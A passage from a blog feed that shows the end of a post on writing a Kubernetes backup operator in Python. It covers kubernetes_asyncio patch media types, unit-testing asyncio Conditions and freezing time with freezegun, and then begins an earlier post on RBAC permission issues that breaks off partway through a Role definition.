</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> ApiClient() <span style="color:#66d9ef">as</span> api:
</span></span><span style="display:flex;"><span>        mine <span style="color:#f92672">=</span> client<span style="color:#f92672">.</span>CustomObjectsApi(api)
</span></span><span style="display:flex;"><span>        res <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> mine<span style="color:#f92672">.</span>patch_namespaced_custom_object(<span style="color:#e6db74">&#34;mei-home.net&#34;</span>, <span style="color:#e6db74">&#34;v1alpha1&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;backups&#34;</span>, <span style="color:#e6db74">&#34;homelabservicebackups&#34;</span>, <span style="color:#e6db74">&#34;test-service-backup&#34;</span>,
</span></span><span style="display:flex;"><span>                body<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#34;status&#34;</span>:{<span style="color:#e6db74">&#34;lastBackup&#34;</span>: {<span style="color:#e6db74">&#34;state&#34;</span>:<span style="color:#ae81ff">1</span>, <span style="color:#e6db74">&#34;timestamp&#34;</span>:<span style="color:#e6db74">&#34;foobar&#34;</span>}}}
</span></span><span style="display:flex;"><span>                )
</span></span><span style="display:flex;"><span>        pprint(res)
</span></span><span style="display:flex;"><span>asyncio<span style="color:#f92672">.</span>run(main())
</span></span></code></pre></div><p>But it did not. Instead, I kept getting errors like this back:</p>
<pre tabindex="0"><code>kubernetes_asyncio.client.exceptions.ApiException: (415)
Reason: Unsupported Media Type
HTTP response body: {&#34;kind&#34;:&#34;Status&#34;,&#34;apiVersion&#34;:&#34;v1&#34;,&#34;metadata&#34;:{},&#34;status&#34;:&#34;Failure&#34;,
&#34;message&#34;:&#34;the body of the request was in an unknown format - accepted media types
include: application/json-patch+json, application/merge-patch+json,
application/apply-patch+yaml&#34;,
&#34;reason&#34;:&#34;UnsupportedMediaType&#34;,
&#34;code&#34;:415}
</code></pre><p>I finally found <a href="https://github.com/tomplus/kubernetes_asyncio/issues/68">this bug</a>.
It seems to indicate that the issue is a wrong media type getting set in the
<code>content-type</code> header. This led me to the <a href="https://github.com/tomplus/kubernetes_asyncio/blob/master/examples/patch.py">examples</a>
file, which shows that a specific content type can be forced by adding
<code>_content_type='application/merge-patch+json'</code> as a parameter to the
<code>patch_namespaced_custom_object</code> call. With that addition, I was finally able
to properly update the time for the next backup in the status, by adding these
lines to the <code>homelab_service_daemon</code> function from before:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>status_body <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;nextBackup&#34;</span>: next_run<span style="color:#f92672">.</span>isoformat()
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">await</span> kubeapi<span style="color:#f92672">.</span>patch_mei_home_custom_object(
</span></span><span style="display:flex;"><span>    namespace, kubeapi<span style="color:#f92672">.</span>HOMELABSERVICEBACKUP_PLURAL, name, status_body)
</span></span></code></pre></div><p>The <code>patch_mei_home_custom_object</code> function is just a thin wrapper around
the <code>patch_namespaced_custom_object</code> function from above.</p>
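<p>For completeness, here&rsquo;s roughly what such a wrapper could look like. This is
just a sketch and not my actual code; the group/version constants and the fact
that it opens its own ApiClient per call are assumptions for illustration:</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client
from kubernetes_asyncio.client.api_client import ApiClient

GROUP = "mei-home.net"
VERSION = "v1alpha1"
HOMELABSERVICEBACKUP_PLURAL = "homelabservicebackups"


async def patch_mei_home_custom_object(namespace, plural, name, body):
    async with ApiClient() as api:
        custom_api = client.CustomObjectsApi(api)
        return await custom_api.patch_namespaced_custom_object(
            GROUP, VERSION, namespace, plural, name, body=body,
            # Force the media type the API server accepts for merge patches.
            _content_type="application/merge-patch+json")
</code></pre>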
<h2 id="some-notes-on-testing">Some notes on testing</h2>
<p>Writing UTs was not always simple here. First of all, I needed to employ a lot
of mocks to remove any attempted k8s cluster access. I&rsquo;m seriously considering
buying some additional Pis and setting up a test cluster. &#x1f601;</p>
<p>My first generic issue was: How do I even properly unit test asyncio code?
Luckily, that issue was easy to answer, at least in the abstract: I used
<a href="https://github.com/pytest-dev/pytest-asyncio">pytest-asyncio</a>. It allows me to
add <code>@pytest.mark.asyncio</code> to my test functions, or to entire test classes,
and the pytest plugin will automatically set up the event loop infrastructure
and execute the test functions with it.</p>
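<p>As a minimal, self-contained illustration (a made-up test, not one from the
operator&rsquo;s test suite), this is all that&rsquo;s needed to await things in a test:</p>
<pre tabindex="0"><code>import asyncio

import pytest


@pytest.mark.asyncio
async def test_sleep_returns_none():
    # The plugin drives the event loop, so the test can await directly.
    assert await asyncio.sleep(0) is None
</code></pre>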
<p>Still, I had a particular challenge with testing the waiting code, specifically
when it comes to testing whether the Condition properly fires. As a reminder,
here is what the code looks like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">cond_waiter</span>(cond):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> cond:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> cond<span style="color:#f92672">.</span>wait()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">wait_for</span>(waittime, update_condition):
</span></span><span style="display:flex;"><span>    cond_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(cond_waiter(update_condition),
</span></span><span style="display:flex;"><span>                                    name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;condwait&#34;</span>)
</span></span><span style="display:flex;"><span>    sleep_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(asyncio<span style="color:#f92672">.</span>sleep(waittime), name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;sleepwait&#34;</span>)
</span></span><span style="display:flex;"><span>    done, pending <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> asyncio<span style="color:#f92672">.</span>wait([cond_task, sleep_task],
</span></span><span style="display:flex;"><span>                                       return_when<span style="color:#f92672">=</span>asyncio<span style="color:#f92672">.</span>FIRST_COMPLETED)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> p <span style="color:#f92672">in</span> pending:
</span></span><span style="display:flex;"><span>        p<span style="color:#f92672">.</span>cancel()
</span></span><span style="display:flex;"><span>    wake_reasons <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> d <span style="color:#f92672">in</span> done:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> d<span style="color:#f92672">.</span>get_name() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;condwait&#34;</span>:
</span></span><span style="display:flex;"><span>            wake_reasons<span style="color:#f92672">.</span>append(WakeupReason<span style="color:#f92672">.</span>SCHEDULE_UPDATE)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> d<span style="color:#f92672">.</span>get_name() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;sleepwait&#34;</span>:
</span></span><span style="display:flex;"><span>            wake_reasons<span style="color:#f92672">.</span>append(WakeupReason<span style="color:#f92672">.</span>TIMER)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> wake_reasons
</span></span></code></pre></div><p>And here is my initial attempt at the test code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> asyncio
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> unittest.mock <span style="color:#f92672">import</span> AsyncMock, Mock
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> hl_backup_operator.homelab_service_backup <span style="color:#66d9ef">as</span> sut
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@pytest.mark.asyncio</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">TestCondWait</span>:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">test_cond_wait_works</span>(self):
</span></span><span style="display:flex;"><span>        cond <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>Condition()
</span></span><span style="display:flex;"><span>        test_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(sut<span style="color:#f92672">.</span>wait_for(<span style="color:#ae81ff">15</span>, cond))
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> cond:
</span></span><span style="display:flex;"><span>            cond<span style="color:#f92672">.</span>notify_all()
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> test_task
</span></span><span style="display:flex;"><span>        res <span style="color:#f92672">=</span> test_task<span style="color:#f92672">.</span>result()
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">assert</span> res <span style="color:#f92672">==</span> [sut<span style="color:#f92672">.</span>WakeupReason<span style="color:#f92672">.</span>SCHEDULE_UPDATE]
</span></span></code></pre></div><p>I&rsquo;m trying to test whether the Condition works properly. My thinking is that
the code path goes like this:</p>
<ol>
<li>[testcode]: Creates an async task ready to run, executing the function under
test.</li>
<li>[appcode]: Runs until it hits the <code>asyncio.wait</code> line</li>
<li>[appcode]: Now waits for either the timer to expire or the Condition to be
triggered, hands back execution to the [testcode]</li>
<li>[testcode]: Executes the <code>cond.notify_all</code> function</li>
<li>[testcode]: Awaits the task, handing execution back to [appcode]</li>
<li>[appcode]: Gets notified in <code>cond_waiter</code> and runs to completion</li>
</ol>
<p>But that was not what happened. Sprinkling in some <code>print</code> statements, I found
that the test code continues running after the <code>create_task</code> call, straight
through the <code>notify_call</code> call. The first time the wait_for gets to do anything
is when the test code hits the <code>await test_task</code> line. And only then does it
reach the <code>await cond.wait</code> line. But at this point, the test code already
executed the <code>notify_all</code>, and the <code>wait_for</code> function does not return until the
timer, of the <code>sleepwait</code> task, is hit, resulting in a failed UT.</p>
<p>The only way I found around this issue is to have the test code explicitly hand
off execution. I did this by introducing an <code>await asyncio.sleep(0.05)</code> before
the <code>async with cond:</code> line of the test function.
Then the <code>wait_for</code> function gets to run until it hits the <code>await cond.wait</code>,
is properly notified, and the test reliably succeeds.</p>
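<p>For reference, the adjusted test then looks roughly like this, with the only
change being the extra sleep:</p>
<pre tabindex="0"><code>@pytest.mark.asyncio
class TestCondWait:

    async def test_cond_wait_works(self):
        cond = asyncio.Condition()
        test_task = asyncio.create_task(sut.wait_for(15, cond))
        # Yield to the event loop so wait_for() can reach `await cond.wait()`
        # before the Condition gets notified.
        await asyncio.sleep(0.05)
        async with cond:
            cond.notify_all()
        await test_task
        res = test_task.result()
        assert res == [sut.WakeupReason.SCHEDULE_UPDATE]
</code></pre>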
<p>This was, yet again, a case where the UT ends up being more complicated than the
actual code.</p>
<p>One more issue I hit had to do with the merciless advance of time. Have another
look at the <code>homelab_service_daemon</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">homelab_service_daemon</span>(name, namespace, spec, memo, stopped):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Launching daemon for </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">.&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span> <span style="color:#f92672">not</span> stopped:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>debug(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;In main loop of </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        next_run <span style="color:#f92672">=</span> backupconfig<span style="color:#f92672">.</span>get_next_service_time()
</span></span><span style="display:flex;"><span>        wait_time <span style="color:#f92672">=</span> next_run <span style="color:#f92672">-</span> datetime<span style="color:#f92672">.</span>datetime<span style="color:#f92672">.</span>now(datetime<span style="color:#f92672">.</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>        status_body <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;nextBackup&#34;</span>: next_run<span style="color:#f92672">.</span>isoformat()
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> kubeapi<span style="color:#f92672">.</span>patch_mei_home_custom_object(
</span></span><span style="display:flex;"><span>            namespace, kubeapi<span style="color:#f92672">.</span>HOMELABSERVICEBACKUP_PLURAL, name, status_body)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> wait_for(wait_time<span style="color:#f92672">.</span>total_seconds(), memo<span style="color:#f92672">.</span>backup_conf_cond)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Finished daemon for </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">.&#34;</span>)
</span></span></code></pre></div><p>It has to compute the waiting time as the difference between the current time
and the time of the next scheduled backup. But how to handle <code>datetime.now</code> in
UTs? I initially tried to handle it with a bit of fuzziness when comparing the
arguments handed to the mocked <code>wait_for</code> with the expected wait time, but that
seemed a bit too brittle.</p>
<p><a href="https://github.com/spulec/freezegun">Freezegun</a> to the rescue. It provides a
nice API to patch <code>datetime.now</code> (and several other related functions) so that
it always returns a deterministic value.
Using it in a UT to verify that <code>homelab_service_daemon</code> calls <code>wait_for</code> as
expected could look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#a6e22e">@pytest.fixture</span>()
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">mock_wait_for</span>(self, mocker):
</span></span><span style="display:flex;"><span>    wait_for_mock <span style="color:#f92672">=</span> AsyncMock(spec<span style="color:#f92672">=</span>sut<span style="color:#f92672">.</span>wait_for)
</span></span><span style="display:flex;"><span>    mocker<span style="color:#f92672">.</span>patch(<span style="color:#e6db74">&#39;hl_backup_operator.homelab_service_backup.wait_for&#39;</span>,
</span></span><span style="display:flex;"><span>                  side_effect<span style="color:#f92672">=</span>wait_for_mock)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> wait_for_mock
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">test_daemon_waits_correctly</span>(self, mocker, mock_wait_for):
</span></span><span style="display:flex;"><span>    mock_memo <span style="color:#f92672">=</span> Mock()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    mock_stopped <span style="color:#f92672">=</span> Mock()
</span></span><span style="display:flex;"><span>    mock_stopped_bool <span style="color:#f92672">=</span> Mock(side_effect<span style="color:#f92672">=</span>[<span style="color:#66d9ef">False</span>, <span style="color:#66d9ef">True</span>])
</span></span><span style="display:flex;"><span>    mock_stopped<span style="color:#f92672">.</span><span style="color:#a6e22e">__bool__</span> <span style="color:#f92672">=</span> mock_stopped_bool
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    time_now <span style="color:#f92672">=</span> datetime(year<span style="color:#f92672">=</span><span style="color:#ae81ff">2024</span>, month<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span>, day<span style="color:#f92672">=</span><span style="color:#ae81ff">22</span>, hour<span style="color:#f92672">=</span><span style="color:#ae81ff">19</span>, minute<span style="color:#f92672">=</span><span style="color:#ae81ff">12</span>,
</span></span><span style="display:flex;"><span>                        second<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>, tzinfo<span style="color:#f92672">=</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>    time_trigger <span style="color:#f92672">=</span> datetime(year<span style="color:#f92672">=</span><span style="color:#ae81ff">2024</span>, month<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span>, day<span style="color:#f92672">=</span><span style="color:#ae81ff">22</span>, hour<span style="color:#f92672">=</span><span style="color:#ae81ff">19</span>, minute<span style="color:#f92672">=</span><span style="color:#ae81ff">12</span>,
</span></span><span style="display:flex;"><span>                            second<span style="color:#f92672">=</span><span style="color:#ae81ff">12</span>, tzinfo<span style="color:#f92672">=</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    mock_next_service_time <span style="color:#f92672">=</span> Mock(return_value<span style="color:#f92672">=</span>time_trigger)
</span></span><span style="display:flex;"><span>    mocker<span style="color:#f92672">.</span>patch(
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#39;hl_backup_operator.homelab_backup_config.get_next_service_time&#39;</span>,
</span></span><span style="display:flex;"><span>        side_effect<span style="color:#f92672">=</span>mock_next_service_time)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">with</span> freezegun<span style="color:#f92672">.</span>freeze_time(time_now):
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> sut<span style="color:#f92672">.</span>homelab_service_daemon(<span style="color:#e6db74">&#34;tests&#34;</span>, <span style="color:#e6db74">&#34;testns&#34;</span>, {}, mock_memo,
</span></span><span style="display:flex;"><span>                                          mock_stopped)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    mock_wait_for<span style="color:#f92672">.</span>assert_awaited_once_with(<span style="color:#ae81ff">2</span>, mock_memo<span style="color:#f92672">.</span>backup_conf_cond)
</span></span></code></pre></div><p>I&rsquo;m mocking away both the <code>wait_for</code> and <code>get_next_service_time</code> functions,
and I&rsquo;m also defining two fixed times: one &ldquo;current&rdquo; time and one trigger time.
Inside the <code>with freezegun.freeze_time(time_now)</code> context, <code>datetime.now</code> reliably
returns <code>time_now</code> instead of the actual current time. And with
that, I don&rsquo;t need to rely on any fuzziness when testing time-related
functionality.</p>
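<p>As a tiny standalone illustration of what freezegun does, independent of the
operator code:</p>
<pre tabindex="0"><code>import datetime

import freezegun

with freezegun.freeze_time("2024-05-22"):
    # Inside the context, "now" is pinned to the frozen timestamp.
    assert datetime.datetime.now() == datetime.datetime(2024, 5, 22)
</code></pre>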
<h2 id="next-steps">Next steps</h2>
<p>Now that I&rsquo;m finally happy with the groundwork, I still need to implement a couple
of features before starting with the implementation of the backup Jobs
themselves.
The first one is proper handling of the case where there is no HomelabBackupConfig
configured. Currently, the <code>homelab_service_daemon</code> function would crash, because
<code>get_next_service_time</code> would return <code>None</code>, due to not having any configured
schedule. That is easily fixable by extending the waiting time to &ldquo;forever&rdquo;.
With the Condition mechanism already in place, the daemons will be woken up once
a HomelabBackupConfig appears and can then return to the right schedule.</p>
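<p>A rough sketch of how that could look inside the daemon&rsquo;s main loop, assuming
that <code>get_next_service_time</code> returning <code>None</code> means &ldquo;no schedule configured&rdquo;:</p>
<pre tabindex="0"><code>while not stopped:
    next_run = backupconfig.get_next_service_time()
    if next_run is None:
        # No HomelabBackupConfig yet: skip the timer entirely and wait
        # "forever", i.e. only until the Condition signals a schedule update.
        async with memo.backup_conf_cond:
            await memo.backup_conf_cond.wait()
        continue
    ...  # compute wait_time, patch the status and call wait_for() as before
</code></pre>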
<p>The second feature currently missing is mostly for testing purposes. Right now,
I&rsquo;m only able to centrally set the schedule, which would be applicable for all
service daemons. This is bound to become cumbersome once I want to start testing
the Job creation and monitoring, so I will want the possibility to trigger a
single service daemon&rsquo;s backup immediately. I will likely introduce another
parameter into the HomelabServiceBackup CRD which makes the daemon trigger
a backup immediately.</p>
<p>Alright, that&rsquo;s all I have to say for now. This is my first &ldquo;programming&rdquo; post
on this blog, and I&rsquo;m honestly not sure how it came out. Were you actually
able to follow, or was it a confused mess? Was it actually interesting to read?
I&rsquo;d be glad for some feedback, e.g. via my <a href="https://social.mei-home.net/@mmeier">Fediverse account</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelab Backup Operator Part I: RBAC permission issues</title>
      <link>https://blog.mei-home.net/posts/backup-operator-1-rbac-issues/</link>
      <pubDate>Sun, 12 May 2024 20:40:59 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/backup-operator-1-rbac-issues/</guid>
      <description>I ran into some issues with the RBAC permissions for my operator</description>
      <content:encoded><![CDATA[<p>As I&rsquo;ve mentioned in my <a href="https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/">last k8s migration post</a>,
I&rsquo;m working on writing a Homelab backup operator for my Kubernetes cluster.
And I&rsquo;ve run into some RBAC/permission issues I can&rsquo;t quite figure out. So let&rsquo;s
see whether writing about it helps. &#x1f642;</p>
<p>First, a short overview of the plan. I&rsquo;m using the <a href="https://github.com/nolar/kopf">kopf</a>
framework to build a Kubernetes operator. This operator&rsquo;s main goal is to handle
HomelabServiceBackup resources. These will contain a list of PersistentVolumeClaims
and S3 buckets which need to be backed up. I intend for there to be one
HomelabServiceBackup object for every service, located in the service&rsquo;s Namespace.</p>
<p>At the same time, I started out by defining a HomelabBackupConfig resource.
This will contain some configs which are common among all service backups,
things like the hostname of the S3 server to store the backups on and the image to
be used for the backup jobs.
There will only ever be one instance of this custom resource, and it should
always reside in the Namespace of the operator itself. Likewise, there
should also only ever be one operator for the entire k8s cluster.</p>
<p>This all seemed sensible to me until this afternoon, by which point I had finally
done all the yak-shaving a new project needs: creating the repo, configuring
the CI for image builds and UTs, and so on. I finally had a container
image I could run, with a very simple implementation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> kopf
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> logging
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.create</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_handler</span>(spec, status, meta, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Create handler called with meta: </span><span style="color:#e6db74">{</span>meta<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Create handler called with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Create handler called with status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.resume</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">resume_handler</span>(spec, status, meta, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Resume handler called with meta: </span><span style="color:#e6db74">{</span>meta<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Resume handler called with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Resume handler called with status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.update</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">update_handler</span>(spec, status, meta, diff, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Update handler called with meta: </span><span style="color:#e6db74">{</span>meta<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Update handler called with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Update handler called with status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Update handler called with diff: </span><span style="color:#e6db74">{</span>diff<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.delete</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">delete_handler</span>(spec, status, meta, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Delete handler called with meta: </span><span style="color:#e6db74">{</span>meta<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Delete handler called with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Delete handler called with status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span></code></pre></div><p>The intention for this was merely to get a feeling for what I was actually
getting for each of the different events, and to play around with when each of
these handlers would be called.</p>
<p>For the first deployment, I launched kopf with the <code>-A</code> flag, which means it
will use the Kubernetes cluster APIs to watch every Namespace. As noted above,
I want every Namespace to be watched, as every one of them might contain a
HomelabServiceBackup object to take care of the backup for the service residing
in the Namespace.
But I started out with only the HomelabBackupConfig CRD defined, as that&rsquo;s the
first step in my implementation plan. The content of the CRD is not important
for now; I will show it in a later post, once I&rsquo;ve actually got the implementation
ready.</p>
<p>I also needed to provide proper RBAC for the deployment, as the operator needs
access to the API server.
My thoughts went like this: For now, I only need the HomelabBackupConfig, and
I only need that in the same Namespace the operator is running in. So I created
the following Role:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
